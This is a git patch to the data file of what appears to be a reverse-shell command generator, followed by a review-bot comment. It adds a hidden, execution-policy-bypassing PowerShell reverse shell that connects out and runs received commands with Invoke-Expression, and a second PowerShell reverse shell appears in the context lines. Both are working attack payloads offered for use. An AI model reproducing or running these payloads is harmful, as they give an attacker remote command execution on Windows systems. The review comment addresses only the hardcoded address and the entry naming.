From 176e9f075872a430196b20eedaa5efaa62260808 Mon Sep 17 00:00:00 2001
From: Martin
Date: Sun, 18 Apr 2021 15:35:02 +0200
Subject: [PATCH] Added PowerShell #3

Added another PowerShell reverse shell, based on https://github.com/MartinSohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1
---
 js/data.js | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/js/data.js b/js/data.js
index 676cdde..df302ab 100644
--- a/js/data.js
+++ b/js/data.js
@@ -164,6 +164,11 @@ const reverseShellCommands = withCommandType(
 "command": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
 "meta": ["windows"]
 },
+ {
+ "name": "PowerShell #3",
+ "command": "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.2', 13337);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"",
+ "meta": ["windows"]
+ },
 {
 "name": "PowerShell #3 (Base64)",
 "meta": ["windows"]
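Review bot: The new entry's `command` string carries the literal values `'127.0.0.2', 13337` copied from the upstream script, whereas the neighbouring entry in the same hunk uses the `{ip}` / `{port}` template tokens (`TCPClient('{ip}',{port})`), so this entry is inconsistent with the data file's own substitution convention and presumably will not be filled in by the generator like the others. Bringing it in line means changing only that fragment to `TCPClient('{ip}', {port})`. The `"name": "PowerShell #3"` also sits directly above the pre-existing `"PowerShell #3 (Base64)"` entry; if that entry encodes a different payload rather than this one, the shared number will mislead readers and a distinct number or a comment linking the two would help. The enclosing `reverseShellCommands` array literal starts and ends outside the hunk.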